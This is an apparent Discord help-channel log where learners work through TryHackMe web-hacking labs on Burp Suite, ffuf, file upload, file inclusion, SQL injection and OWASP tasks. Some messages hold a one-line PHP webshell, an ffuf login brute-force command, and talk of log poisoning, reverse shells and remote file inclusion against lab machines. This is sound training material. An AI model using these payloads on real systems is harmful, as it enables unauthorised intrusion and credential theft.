#web-fundamentals-path
can anyone point me in the direction of something that's changed? is it something that is outdated in the text steps that I might have overlooked?
currently on task 11 i keep getting "error no route to host" on the burp browser
Do you have intercept on?
i did yes
and then i forward and I also tried it with it off as well just to see what the page would load @restive hemlock
attack box
after i hit forward once the button wont allow another click if thats helpful at all info wise
Can you send a screenshot?
for sure of the error page or anything in particular ?
Full Attackbox.
on laptop so not many windows up at once but anything ya need ill send
at intercept
after forward
what is 10.10.33.186 ?
the target attack machine
Which room are you doing?
task 11
also a previous task question was not correct as MISC is no longer in the version being deployed in the attack box. i caved and looked up that answer.. if that's helpful to not i see you're a room tester so wanted to pass that along as well i can capture that as well if you like
task 7
Those sort of things would need to be posted in #room-bugs
will do
I'm a room tester, which is a volunteer role, I'm not part of the moderation team in Discord, nor am I part of the staff team of TryHackMe.
understood thanks for forwarding me the correct room to post in .. still lots to learn your help is very welcome
Anytime.
should i shut down the machines and try starting over?? i caved on this part as well and checked out a video clip .. i really want to do this unguided as thats how i learn personally the best.. but in this case I saw the person get to that step and what his site looked like and well thats why i came here to see what I am missing
I've loaded up a machine, I'm going to try and do it.
rgr that
Your website doesn't open for me, I suggest terminating the VM, and re-trying.
thanks ill term now
get back to you in 2 min or so im assuming give it its usual spin up time etc
thank you i can continue. for what its worth i tried that once figured i missed something else on burp .. etc
much appreciated
Happy hacking.
HELP cant get code for juice shop Task 3 Question 1
I think it might be a bug but want to make sure
https://youtu.be/G_OMkzMJ-wM
hello
can I get started in bug bounty by completing web fundamentals path?
What others paths should I complete to get a good grasp in bug bounty?
i think the junior pentester would be a great one too
make them all
Hello, the JuiceShop is not giving the flag codes for some of the tasks, just FYI. I was successful and nothing popped up on multiple tries so I had to unfortunately go and find them on google lol.
To be more exact, the whole "Where did that come from?" section.
Task 19 - What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js? The reference answer is outdated. Hence it does not accept the actual hash. Should be updated
May I ask which room is this?
Hello! (first time posting) im having issues with the NMAP room, im stuck on the question "Which RFC defines the appropriate behaviour for the TCP protocol?" on task 5, i know the answer, even found a video and the answer is 3 star then 3 star but mine is " 3 star then 4 star" (not sure that will show up but mine has an extra star in the answer compared to the video) any help is appreciated!
Hey guys I am looking for some assistance, please refer to the attached screenshot for example. Say I've identified an LFI here & am able to read the /etc/passwd . What should be the right approach for getting an RCE ?
I was thinking about poisoning either of the logs FTP/SSH ssh PHP_Backdoor_code@IP and then navigating to the auth.log file from the website itself which will make the webpage execute the code but I believe the access would be limited to read the file same thing for the FTP as well which may or may not be readable. My question is primarily about how to know if I am accessing the right file path through the browser ?
Appreciate all feedbacks!
if there are dedicated rooms around log poisoning please do let me know
Typically you'd poison the webserver logs with user agent or similar
And there's one, but I'm not sure if it's still available. An LFI room
Thanks for responding. So how do we actually navigate to the right file is what I am also trying to understand.
Gave +1 Rep to @orchid hazel
I don't know what you mean by navigate as you don't have a file browser
But you know, if you put like 10 ../ then you'll almost certainly hit /
Yeah, that's what I was trying to say
i am trying to get the response from this request for upload js
but it gives me a response of not modified
i have removed the js part from here
aah so it was cache problem
I'm still learning but I think FFUF and DNSRecon are different tools.
I see FFUF like to use "wildcards"
while with dns recon you can "identify" the DNS of a domain.
This is from the docs -> Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT).
dnsrecon -d microsoft.com
ah yeah, but I think its not quite the same because the example here was when the dnsrecon was used to bruteforce, the command '-t brt' if i recall correctly, as opposed to your example, since just using the -d command isn't really bruteforcing it
i was mainly confused because during the scenario i mentioned, it seemed like the same purpose of bruteforcing was attempted using two different tools.
but i realise now
that the dnsrecon used in this scenario was determining the subdomain by checking random subdomain names from a predetermined wordlist against a DNS server , as opposed to ffuf which is using a user defined wordlist (as opposed to dnsrecon predetermined one), and is testing them through the HTTP protocol
Assuming I haven't grossly misunderstood it from my current perspective
lmao
I think i understand now actually, fundamentally the ffuf was just trying to find valid web addresses by testing different HTTP get requests using different subdomain names, so it was just testing different links, based off the subdomains in the user specified wordlist.
Whereas the dns recon was just testing different domain names and seeing if they matched with the certain domain name stored in the DNS server (which corresponded to a certain IP address)
HTTP vs DNS. Lol
That last line is the key IMO
You might want to look into something called vhosting, which is how you can have multiple sites on the same port+IP address and the same webserver
Vhosting being short for virtual hosting
Thanks for that suggestion, I will check it out.
Hi everyone, I am working on OWASP Top 10, Task 28: [Severity 9] Components With Known Vulnerabilities - Exploit. I got to the part where I ran python3 47837.py and got the result Usage: cve2019-16278.py <Target_IP> <Target_Port> <Command>. I tried running python3 47837.py 10.10.53.120 80 id and this gave me error
Traceback (most recent call last):
  File "/root/Downloads/47837.py", line 67, in <module>
    cve(target, port, cmd)
  File "/root/Downloads/47837.py", line 54, in cve
    soc.send(payload)
TypeError: a bytes-like object is required, not 'str'
I am googling around to figure it out, but also maybe somebody has a hint?
is that the bookstore one?
it's nostromo web server
uhm weird, my owasp top 10 has only 23 tasks Oo
oh nvm, they made changes, found it.
did you try to start it with just python exploit.py ? might be just a version thing
ah ok, i got that already. i thought there is a step more. in the example/instructions they also showed actually running an IP, port and command. in one of the last screenshots. so i thought i should do it with an IP of the Kali machine
for some reason, i am stuck in task **Task 8 Bypassing Server-Side Filtering: File Extensions**
no matter what extension i give, the website seem to be accepting only .txt it literally rejected a simple .jpg
and i tried numerous extensions to bypass the filtering like .jpg.php .jpg.php5 .txt.php5 .phar .ph5
but it keeps saying "File must be chosen before being uploaded. Type "help" for syntax"
somebody help
Which module @whole breach ?
One of those extensions can actually bypass the filter. If you're still getting this error reboot the machine and try again.
Upload Vulnerabilities
yeah i got the flag
I have a question regarding Burp-Suite.
What browser do you use with Burp-Suite?
Is it the Burp Browser or any of the external ones and why?
burps built in browser or firefox profile with foxyproxy
Burp's Chromium browser will be detected by some signatures,
so if I get blocked during pt I will switch to firefox + Proxy SwitchyOmega
If u get ''Blocked during pt'' What is PT and where do i see if i get blocked?
And thanks btw!
like blank pages or 403 error codes
pt = penetration testing
As I have kinda set up my own firefox-burpsuite setup as we speak; I wonder.. Why not just use the proxy settings of the Mozilla Firefox itself instead of use an additional program(the switchyomega)?
Because plugins will make things easier, for example:
You are viewing the site target.thm with burp proxy enabled, but then you want to visit google which have HSTS enabled so the proxy can't handle it,
To solve this problem, you can specify to enable burp proxy only on the target.thm site,
then you can visit google normally
That indeed eases things.
To tackle this issue I use Firefox + built-in proxy and Edge for research etc etc.
For now...
Now let's get to cracking! Wth is burp-suite anyway. I dont think i'll get the hang of it in one day haha
Intercept can apparently stop my browser from accessing the page and gives me opportunity to change somethings somehow.. interesting

hello
anyone here?
im doing the jewel but for some reason i cannot get the /assets/js/upload.js .. path to cach i burp
anyone has any idea why?
nvm solved
I need help. I have been connecting with openvpn but when I'm trying to open a ACMI site with my virtual ip address the page is still loading
how can I solve this problem?
connection time out
Hey guys
I'm going over the Web Fundamentals room - Introduction to Web Hacking - Authentication Bypass (Task 3: Brute Force)
Link: https://tryhackme.com/room/authenticationbypass
I have a question regarding the command used. Why are we using -fc 200 ? This will filter out all the HTTP responses with the status code of 200 (OK) right? aren't we interested in those ones (successful login with the username and password) and instead should be using -mc 200 ? But the command with -fs 200 is returning the right result so I'm getting confused here. I tried to understand the difference and read the man page of ffuf, still thinking this is the opposite to what I understand.
Appreciate any clarification. Thanks!!
Hi,
When using burpsuite, proxy for intercept via browser, it keeps giving errors.
About sandbox, OS doesnt support this. When i follow the steps to change this, the burp browser still does not work. Any suggestions?
Hey
Hello
Hey guys I started the Authentication Bypass but i find it sooo hard especially the curl part can anyone help
If you're a free account you might not be able to curl, unless you have a VM.
no i m not a free account the problem is i have no clue what is that for i understand that curl i for communicating from and to the webserver
If you follow along, it will work
i guess i am the only one hhahaha sorry bro and thanks for help
If you're completely stuck, there is a video by John Hammond.
@restive hemlock can i have a link please
Sorry, I'm looking at a different room
I'll load on up, it's been awhile.
@restive hemlock feel free bro
Did you create an account?
@restive hemlock what do you mean in tryhackme ?
No, on the room
no i haven't i guess
You need to, so you can send the requests.
How i can create it i m new to discord sorry
ahh yeah i did bro sorry for the confusing , i got quiz right but the syntax and how it works i couldn't understand it
hey guys
has anyone come through the file inclusion challenge i've seen people doing the first task with burp , it doesn't make sense we didn't learn burp before
I've answered you in another channel.
hmmm, in the sql injection room > Task 5, the flag should appear in the pop-up after answering martin's password question?
yeah
ok, so the popup appears and immediately disappears to load the second page for me
Oaft, I dunno how to help that one, do you use a recorder?
yes, I thought about it, it was just to bring up the info
That's your mistake, using that mess.
hi guys, i need some help with the challenge of "SQLMAP"
unfortunately only with the chat (my level of English is very low)
Hey guys. I'm currently stuck on Task 15 on the OWASP 10 10 room. I managed to find an RCE exploit that gets a reverse shell back to my machine, but I can't seem to get it to connect to my machine. At first I thought it was because I was running my kali in a VM, so I tried using the same exploit in the Attackbox on THM and it still doesn't connect. Any ideas on what it could be?
For context, the tasks asks me to get the content of /opt/flag.txt so I thought the best way to do that would be a reverse shell, but I just can't seem to get the reverse shell to connect to my machine no matter what I do
I looked at the code of the exploit and it doesn't require anything specific aside from the URL, an lhost and lport
I've been stuck on this way longer than I want to admit..
Which Owasp top 10 room?
Old or new?
It's OWASP 2021 @restive hemlock
I'm going to boot it up, I already think I know which one it is.
Yup, bookstore.
I found two exploits and neither seem to be working. I'm gonna feel real dumb if it turns out to be something simple lol
Can you tell me if I missed something?
I think you did, can you tell me what you tried, and screenshots please?
And link me the exploits you used,
So far I've tried https://github.com/jayngng/cse_bookstorev1 and https://www.exploit-db.com/exploits/47887
I can get a shell to upload on the first one, but it doesn't connect, whether it's in my kali VM or the attackbox
..
I tried in both my kali VM, and the attackbox
Wait
I thought port 85 was where the webapp was hosted
and 4444 is my local port

Local port won't be needed either.
Running it without specifying a local port triggers a TypeError
Strange.
I tried that one too
Buuut I was using the wrong port...
Try use the right one this time
It uploads but can't execute commands apparently
Screenshot?
Much appreciated!
No problem!
I was stuck on that for like a whole day
Hello everyone. Has anyone tried webshell in file upload vulnerabilities #Task5 - Remote Code Execution? Most of the walkthrough show use of reverse shell. I tried with the given php payload but it does not work.
It gives a 500 error if I access that page - http://shell.uploadvulns.thm/resources/webshell.php?cmd=id
Can you send a screenshot please? We won't be able to access it as you might have added an entry in the /etc/hosts file for the domain.
What php payload are you using? The command you are executing is 'id' and it doesn't seem to be a reverse shell.
Sry I tried earlier but I do not see an option to upload a screenshot/file.
I uploaded a php webshell file to /resources path. And then used above mentioned url to test the file.
The code I uploaded in the webshell.php file is
<?php
echo system($_GET["cmd"]);
?>
I uploaded another image file and I am able to access that but this file gives 500 error
!docs verify
@nocturne yarrow you need to verify your account to be able to post screenshots
Have you tried to upload a php reverse shell (and changing the file extension to bypass the restriction) instead?
Thank you I will check this
Gave +1 Rep to @short wave
So im in the How websites work room and im not sure if i did something wrong or not, but the dog image is not showing up
<!DOCTYPE html>
<html>
<head>
<title>TryHackMe HTML Editor</title>
</head>
<body>
<h1>Cat Website!</h1>
<p>See images of all my cats!</p>
<img src='img/cat-1.jpg'>
<img src='img/cat-2.jpg'>
<img scr='img/dog-1.png'>
</body>
</html>
It's src, not scr
ah so im just dumb thanks
It happens
Hey there
I've question
I was logging in to my cpanel with valid credentials. But a few minutes later I am no longer able to gain access. It just says invalid creds. So my IP addr is blocked?
Which room are you working on?
Im talkin bout my own website bro
Hi, I am trying to complete the OWASP juice shop exercises, but I am not able to get the flags even the solution seems to be working. To be precise, in the case of where did that come from (DOM XSS), I can see the XSS popping up, but I do not get any flag. I cleared the browser cache, I terminated the machines again and again, I switched to chrome, but no success. And now I am stuck, could you anybody help me this issue? Thanks.
@rare relic did you find the score board? Look there after the specific "succes-entry" and click on the green switch on the right side. then the flag should be displayed again. I had the same problem, however, only with one flag.
Thanks for your quick response. But I am not able to locate any scoreboard, could you elaborate?
Gave +1 Rep to @karmic dew
problem solved, thanks a lot. Although, I did not find the scoreboard, I just re-ran everything, and instead of typing the command, I copied it from THM, and it worked, still not sure why! :--)
Gave +1 Rep to @karmic dew
@rare relic Very nice.
Just started the VM. The above mentioned page is available and you should definitely take a look, if you accidentally clicked away one of the other flags
So far I got all the flags, but I was only stuck with the DOM XSS, but by scoreboard, if you mean the green pop-up, then yes, I can see that, otherwise, nada. Your brother is new to this whole thing :--)
@rare relic it's no popup, it's a webpage Finding the page also gives a flag. But you don't need the flag for this room, as far as i can remember.
you are right, but now I checked the THM material, and I have to still finish the XSS exercises, and then the last one is about the scoreboard. Cheers mate :--)
why I can't load image
and I add domain in /etc/hosts but use firefox can't load web
I'm in china, I use the vpn on the kali
I use the curl can view source, but web can't, does anyone know why?
I tried to remove user-agent successfully using browser access
firefox will ask you if you want to visit the domain on the top, if you ignore it then it wont work
Hi, I am new to this course and I got a little stuck.
How can I find where is the directory listing flag in a web? I don't know what to use.
Your favourite browser directory brute forcer.
100%
"Upload Vulnerabilities" Challenge was a bit "hard"
had to restart the server sometimes , so if a function does not work , restart may help
Can you be more specific? As I am new so I actually did not understand what you meant
ffuf, gobuster etc.
oh thanks I will do some research about how to use them
DubZz and ScrubZ. This could be a WWF tag-team.
Only of our costume resembles either the Legion of Doom, or the Bush wackers
Hello, I'm in the room: Upload Vulnerabilities
(https://tryhackme.com/room/uploadvulns)
task 9: Bypassing Server-Side Filtering: Magic Numbers
and I had a recurring problem when trying to upload the shell.php file
After adding the magic numbers modification, I can't upload the file, even though the file is displayed as a GIF in the shell.php file
Hi, is there any way to exploit jquery v1.7.1
hey
i was doing content discovery module and after waiting for 2 mins and turning the machine when i click on link its showing that site is taking too long to respond and its not working , what should i do, 4-5 times i turned off the machine and again restart the machine then waited for 2 mins but after these steps also nothing happening same thing showing again and again that site is taking too long to respond, i have a great bandwidth still nothing happening
Are you using your own box or the attackbox? There are occasional issues when using your own VM. Try to spin up with the attackbox and see if that works.
has anyone gotten through the upload vulns room recently? I cannot get any file to upload on the server side filter extension bypass.
I just get stuck at a loop where its saying a file must chosen before being uploaded.
its not working on attackbox too bro
it show connection error
everywhere
personal vm or attackbox
What's not working exactly?
hello, so im doing a task on network security 2 and im working on my own kali linux vm, but everytime i try to run this command " cd /tmp/mount/cappucino" it always gets stuck at cd /tmp/moun and i cant type anymore...anyone can help with this issue? thanks
can you send me the link of the room
If you are in rev shell have you tried to stabilize your shell
It's not a reverse shell...
Post some screenshots of the errors you are receiving. Will be easier to narrow down your issue.
i am not able to put screen shot
the sites given in modules
i am not able to connect on that
from linux from attackbox
stat /usr/share/wordlists/SecLists/Usernames/Names/names.txt: no such file or directory
this is the error
Error seems to be pretty straightforward? Did you check if the file you are looking for is even in that path ?
I'm doing content discovery module from the Web Fundamentals path but I got stuck at task 2. I cannot connect to robots.txt file even though I'm using the correct machine IP. I'm connected using Attackbox but when I post URL in firefox I got this msg "Unable to connect". I searched in discord for previous similar queries but cannot find solution to mine. Any suggestions?
Hi everyone (upload vulnerabilities room challenge), when accessing via modules ../content/XXX.jpg I get a 504 error and no shell, although I uploaded a java webshell script and located the file. What could be wrong?
There's a connection (one single) to Netcat, but the shell doesn't appear. I tried make the shell an executable (?) this doesn't change anything.
Shell must be broken, but...? No idea...
Try http instead of https
I haven't worked with a java webshell that much, but have you tried a reverse shell one? Also, have you checked which OS the target is running?
Thanks for replying! Sorry for explaining badly. It was a reverse shell, I got a signal from it (it did "call home"), but not more than that. It was a NodeJS script from the swisskyrepo on github.
It worked thanks
Gave +1 Rep to @short wave
Did you guys enjoy this path? I'm finishing SOC 1 and thinking of doing this next
Hi there,
Someone can explain to me why it is -fc 200 in the ffuf request and not -mc 200 ?
We are searching a match between the username and the password so why -fc 200 parameter ?
Thanks !
-fc 200 is looking for a "200 OK" request, which means it was successful.
But read the explanation text below "... status other than 200"
And in the documentation it is explained that -fc is to filter out and -mc is to match.
So in this room the expected result is another result than 200 it means that if the request match we will be redirect through another page it means that we are waiting for 300/301 status code ! Enjoy
Rq:
-fc : filter out
-mc : match
Careful sir -fc is filter out so not looking for a 200 status code
tryhackme tricked me. in burp suite room i went to admin.tryhackme.com and got rickrolled!!!
Looool.
that's actually so funny lmfao
There are other boxes that give you similar surprises so there isn't a lack of it.
whenever i use ffuf tool to fuzz i got blocked by website. How can i bypass it??
Which website?
If it is a publicly facing website, there are security measures against scans like that.
Hello
In Burp Suite Other Modules Room https://tryhackme.com/room/burpsuiteom
I can't seem to get the link to load properly. http://<IP>/support/login I've tried with intercept both on and off, but only received an error message below. What am I doing wrong here?
Are you on the Attackbox or VPN?
Also, did you mean to block out the IP in the failure line?
I'm using VMware without a VPN on this room. Yeah just blocked out the IP, since I closed out of the box.
Ok, I was just wondering because you blocked out the IP in the line, but you left it in the address bar.
ahh well I grabbed a quick screenshot before closing it out.
I have a meeting in 5mins, so if I don't pop back in. It's cuz of that. Thanks for the help by the way.
You should be able to access the ip, not right away, sometimes it's 5-10 mins
Good to know I'm impatient lol thanks Scrubs
It wasn't the deployment time. It was that the working link is https://10-10-29-76.p.thmlabs.com/support/login/ instead of http://10.10.29.76/support/login what's listed in the room. That should be a quick fix, but others are going to run into the same problem.
Both links will work.
The p.thmlabs don't need on the vpn to access.
wouldn't work for me. strange
I was able to get into the shell, but how do I navigate to /opts/flag.txt?
Directory traversal.
i feel stupid, but i was trying to traverse the directory using cd, but i can't get anywhere
i figured it out
nvm
i used cat /opt/flag.txt
i wonder why using CSE Bookstore 1.0 - Authentication Bypass or the other two didn't work?
Cse bookstore 1.0 should have worked.
What was your syntax?
hi, i'm on the "Upload Vulnerabilities" room on the task 8, when i try to upload a file i get an error 500. I'm not sure if it's normal
just reload the machine seem to be working, my bad
4 Learning Paths Done!
6 more to go! Next path: SOC Level 1
Ran into the same problem using the CSE Bookstore 1.0 - Auth Bypass.
python3 48960.py http://10.10.225.180:84 and I received a syntax error.
So weird, I'm getting this error. I didn't modify the file in anyway.
Maybe it's the wrong exploit
That's what it was. That's what I get when following someone's write up and not reading all the way through.
thanks Scrubz
https://tryhackme.com/room/subdomainenumeration Task 6 Virtual Hosts. I don't really understand this:
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP
The above command uses the -w switch to specify the wordlist we are going to use. The -H switch adds/edits a header (in this instance, the Host header), we have the FUZZ keyword in the space where a subdomain would normally go, and this is where we will try all the options from the wordlist.
Because the above command will always produce a valid result, we need to filter the output. We can do this by using the page size result with the -fs switch. Edit the below command replacing {size} with the most occurring size value from the previous result and try it on the AttackBox.
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}
"Because the above command will always produce a valid result" what do you mean by that?
Did you start the machine?
Have you tried sending the request using the command provided?
Doing so will provide a status code of 200, even if the subdomain name you provide is invalid as it will only redirect to acmeitsupport.thm. That's how I understood it. You can also do the TakeOver room (https://tryhackme.com/room/takeover) to reinforce the concepts though I haven't finished it myself. I'm only at the point where I identified the subdomains.
Ok, now I get it. Thank you
Eventually I finished this task, I just didnt understand that point. I always start the machine and the AttackBox, I dont see another way to learn.
I have a question on LFI challenges
Just ask away and someone will answer it, haven't done the LFI challenges myself though.
task #8 of File Inclusion, on flag3 I fired a local http server using python http.server module and served a php file to read the flag from /etc/flag3 then I used curl with POST method to send a variable file=point_to_my_local_http, I was using the VPN. But I feel I cheat it. Is there any other way? already completed the room but I'm curious since the hint mention to review $_REQUEST on PHP to see what's not filtered.
I made the file with no extension since the server is always adding .php at the end
and of course, name my file .php
i find myself to be really bad at web application penetration testing but good at network pen testing . is that normal ? i passed the network security modules easily as i have a better Technical background in networking in general. also i am starting to feel kinda web app hacking boring lol. does anyone feel the same way ? can someone help ?
Going live at 8pm PST on https://twitch.tv/0xgsat
Completing Web Application Security Path > Content Discovery
Hello, I have a problem with the room "Upload Vulnerabilities"
I do not understand very well the manipulation to do so
I can't access the website "overwrite.uploadvulns.thm"
Thanks for your help
Have you added the required entry in your /etc/hosts file?
I tried but I must be doing it wrong :/
I tried several things
" sudo nano /ect/hosts " but it tells me that there is no direction for /ect
"vim /ect/hosts"
but it still doesn't work when I want to go to the website
the path is "/etc/hosts"
you are typing "ect"
sudo nano /etc/hosts
@static ginkgo
"What does Sequencer allow us to evaluate?" What is this answer??? I cannot find
What room are you working on please?
okay i found it
how do i get to this window? used to mac ( sorry )
That's Remmina.
remmina?
what do you mean?
Remmina is a free, open-source tool for handling all your remote connection needs for protocols like RDP, SSH, SPICE, and VNC
Its a remote desktop application with UI in Linux based OSs
i'm at introduction to window why do i have to install remmina ?
i don't understand how to get to this window
Because remmina is better than xfreerdp
I'm having so much fun with this so far. Just finished Local File Inclusion. It took me a while to fully grasp it but I'm very proud that i was able to figure it out on my own
I'm running into this same issue. Any help? sha256sum after a wget isn't getting me the answer
@uncut cove click the + button top left
Struggling with the bruteforce with ffuf. I made the valid username text file and ran the command but it doesn't give a user or password. also doesn't give errors
Can you share the entire command?
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.150.143/customers/login -fc 200
I don't see anything wrong with the command. Can you share a screenshot of the screen after running the command?
!docs verify
this is the command from my notes @boreal jasper "ffuf-w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W:2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.94.46/customers/login -fc" i can't spot a difference but worked for me
i just compared them in a text comparer and they're exactly the same so it might be a THM problem
are you letting ffuf run the whole operation or are you stopping it early? because from memory the results appear near the end of the wordlist
correct me if im wrong
i let it run the entire time. I just moved on with other stuff. I went back and typed the command in like normal and it worked. Maybe at the time it was bugged?
yeh maybe the webserver did not boot properly, glad you worked it out
@proper moat Do you still need help with your question? Or did you figure it out? I had the same issue as you, but I managed to get it to work
In this room, under intro to web hacking, content discovery is completed completely but it still does not show green checkmark...I don't know what's pending..
Good-Morning People!
Have a nice hacking day
LOL I don't believe if this is possible?? 101% Completed........
What's wrong here??? It does not give me a Green CheckMark on completion.
Maybe one of the tasks is repeated.
But I am not getting green checkmark for completion of it...
How do I start
anyone good with PHP? I have no experience whatsoever and having a hard time with the first question on task 2 in Command Injection
EDIT: NVM: I was looking at the wrong code snippet it was referring to
it was someone else asking the question i believe it was @boreal jasper
thank you tho and i also dont think the problem was solved
Hey pals
I'm new here
How do I go on this long journey
Glad to have you aboard, welcome!
Yeah
Thanks
Okay, I'm stumped and it's probably something stupid simple, but looking up it seems others had the same issue.
Authentication Bypass, https://tryhackme.com/room/authenticationbypass, Task 3 "Brute Force".
Command being issued:
root@ip-[REDACTED]:/usr/share/wordlists/SecLists/Passwords/Common-Credentials# ffuf -w valid_usernames.txt:W1,10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://[REDACTED]/customers/login -fc 200
Response:
```
 :: Method : POST
 :: URL : http://[REDACTED]/customers/login
 :: Wordlist : W1: valid_usernames.txt
 :: Wordlist : W2: 10-million-password-list-top-100.txt
 :: Header : Content-Type: application/x-www-form-urlencoded
 :: Data : username=W1&password=W2
 :: Follow redirects : false
 :: Calibration : false
 :: Timeout : 10
 :: Threads : 40
 :: Matcher : Response status: 200,204,301,302,307,401,403,405
 :: Filter : Response status: 200
 :: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
```
valid_usernames.txt is formatted as follows, and yes I placed it in the same folder together:
0day
dolphin
Jake
Skidy
- Using attackbox
- Skimmed thru ffuf github
- Reviewed the room a few times
- Terminated and launched the server again
- Tried outputting into a file, nothing useful
What am I missing? 
facing issue, can't access [ Server not Found ]
room : uploadvulns > Task 8
annex.uploadvulns.thm
magic.uploadvulns.thm
jewel.uploadvulns.thm
first 3 were fine for me (overwrite, shell, java) so that means my hosts file is ok, what's the issue here?
- i had to restart the machine multiple times to make the reverse shell upload work, it was a bit laggy (not responding)
those usernames are not correct. not sure where you got them from
I just changed them, so I don't give anything away.
oh
are you running the terminal in same directory as usernames ?
the valid_usernames.txt and password file must be in same folder from where you running the command
Correct, I have the terminal open in the folder they are both in /root/Tools/wordlists/SecLists/Passwords/Common-Credentials/
yes + that or just add directory of the passwords after W1,/usr/......
i remember i got stuck there too, all i did was move the usernames to a folder that can be accessed without root privileges, and i specified in my cmd where my password list is, just add password directory after
ffuf -w valid_usernames.txt:W1,[ur passwordlist dir]:W2 -x .....
Thank you, that worked!
np Gl with ur path
This path is really good for learning web exploits, very bad for what hair I have left.
Hello, how can I secure my website from file inclusion attacks?
Hey all, i try to finish this part 4 decoder hashing on the burp part and i don't understand where i failed with the decoder, i know the response so i try to encode etc with the hint and i don't have the same result of the ssh key
I finished this a while ago and didn't take very good notes but I remember this one being a real pain. I remember having to decode the initial key into HEX and then into MD5. I had to be really careful about cutting and pasting because even one extra space at the end of the key changes the hash completely.
Has anyone found the right exploit for OWASP Top10-2021 Task 15 (Vulnerable and Outdated Components - Lab)? I might have to skip this and come back to it with fresh eyes.
I just completed that room the other day. Review task 14 and use the resource it shares for task 15. What stumped me was identifying the platform but it's in plain sight which then leads you to use other things the room has taught you as well.
I figured that I was simply using the wrong keywords when I searched Exploit-DB. I couldn't quite pin it down.
Is burp suite browser really that slow im on room file inclusion?
If it is being too slow for you, firefox and foxy proxy is also an option. I have never used the burp browser so I couldn't tell you if it normally slow or not though.
I am also currently trying the owasp top 10 room and task 15 confuses me a lot. Task 14 mentions a python script but when I look through exploit database and search for bookstory I only find 4 entries, one of them being authentication bypass which is not a python program but a simple text file. The information works and I could enter as an admin but that doesn't help me find the flag. Even after googling I found a walkthrough that leads to the text file then suddenly talks about a python script. I am very confused, is it possible that this room wasn't updated properly?
The room is perfectly fine and accurate. Why are you searching for "bookstory" on exploitdb? Task 14 clearly tells you to search for "||Nostromo 1.9.6||" and upon doing so a python script is found just like the task says.
I looked for book store for task 15. I am still a little confused but I found the flag now
i found it helpful watching an hour video before attempting it alone
since he expands on some of the topics and makes it easier to understand the "why" behind it
you can lookup "TryHackMe - OWASP Top 10 (2021) - Live Walkthrough" if you are interested @quick pelican
Anyone knows if there is a problem in UploadVulnerabilities TASK11(Challenge) with Burp Suite ? I wasnt able to capture the upload of the bad file i was trying to. It seems like it completely ignored although i could capture a legit file upload...
Hi Everyone, Just doing this room from last month, i was in file inclusion room, i thought i need to document my work via blogs, can i use the room's screenshots in my blog, is that legal or illegal?
I don't think it is illegal as there are already several writeups on various TryHackMe rooms published over the Internet.
Yeah that's right, just for clarification, thanks
Just did it, it's working my side
Today I finished the SQL Injection room and I've a question about task 10: remediation.
There is the following advice:
Prepared Statements (With Parameterized Queries):
In a prepared query, the first thing a developer writes is the SQL query and then any user inputs are added as a parameter afterwards. Writing prepared statements ensures that the SQL code structure doesn't change and the database can distinguish between the query and the data. As a benefit, it also makes your code look a lot cleaner and easier to read.
=====
Can someone give me a simple example of how such SQL code would look (bad/good one)?
Thanks
Sure (:
An SQL code in php looks like (without prepare):
```php
if (!empty($_GET['id'])) {
    // User input is concatenated straight into the SQL string
    $result = $odb->query("SELECT * FROM `products` where `id`=" . $_GET['id']);
    $product = $result->fetch();
} else {
    die('No product is given.');
}
```
This code is vulnerable to SQLi as the GET parameter isn't sanitized.
A safe SQL Code should be like (with prepare):
```php
// The query structure is fixed; :username is bound as data at execute time
$SQL = $odb->prepare("SELECT * FROM `users` WHERE `username` = :username");
$SQL->execute(array(':username' => $username));
$userInfo = $SQL->fetch();
```
By using prepared statements, you ensure that user input is treated as data, not executable code, which helps prevent SQL injection attacks.
Thank you!
Which "attack server" do I use for the RFI attack (File Inclusion) ?
In playround.php
Your own, like a simple python server is already sufficient
Thanks. That worked
@rare relic
I have completed introduction to cyber security and pre security and web fundamental paths in thm
And now I need to test myself and I put all things i learn into action
Any suggestions which room or Practice series i should complete to achieve my goal
You should try to do some easy rated boxes in THM.
Ok
Question: Is the burp suite module on the Attackbox still on par for completion of the Burp Suite module? It's the second time that I try to do tasks and an option is not available. In this case I try to do, within Other Modules, task 8, which is Sequencer Live Capture, and for me the Cookie and Form field are grayed out after I have captured the request and sent it to the sequencer.
I'm doing Web Fundamentals path and need help in Task 10 (Site Map & Issue Definitions) of Room Burp Suite (The Basics).
I have to receive a flag after visiting unusual endpoint. Tried looking on YouTube etc as well but they don't have this one as there might be some update in this room.
You just need to constantly browse the website, when you hit enough tabs it should open.
I have completed this path Can you guys please suggest some ctf
Any1 has some suggestion for challenges to test my knowledge on different attacks like lfi, sqli, command inject, xxe inject
Have you done all the thm rooms?
Nah but im studying the bug bounty hunter path on hack the box and want to try it on some thm rooms
Im specifically looking for any tryhackme rooms
You can use the search to search for keywords. (Tags)
Yeah even that cant satisfy me
So im here looking for some suggestion
I would appreciate a room similar to owasp juice shop
This one?
Although this is just a medium-rated one.
More please loved this one
Hi, I'm doing upload vulnerabilities room but stuck from the start. I'm using attack box and on thm VM, I'm not able to find /etc/hosts (hosts file). Moreover I'm not able to access web page where I have to overwrite an image file. Any guidance please
You need to do sudo nano /etc/hosts
Okay I proceeded, uploaded img but not getting flag
Mountains.jpg file is not there already in Linux places, how I can overwrite it and get the flag
Hi guys! I just launched the Content Discovery room and I'm stuck on the 1st task. I can't figure out where to start; anyone that can give me a hint? Thank you
Task 1?
All answers to Task 1 are inside the Task 1 text.
Oh, I thought I had to search for them in the website
Thank you so much hahaha
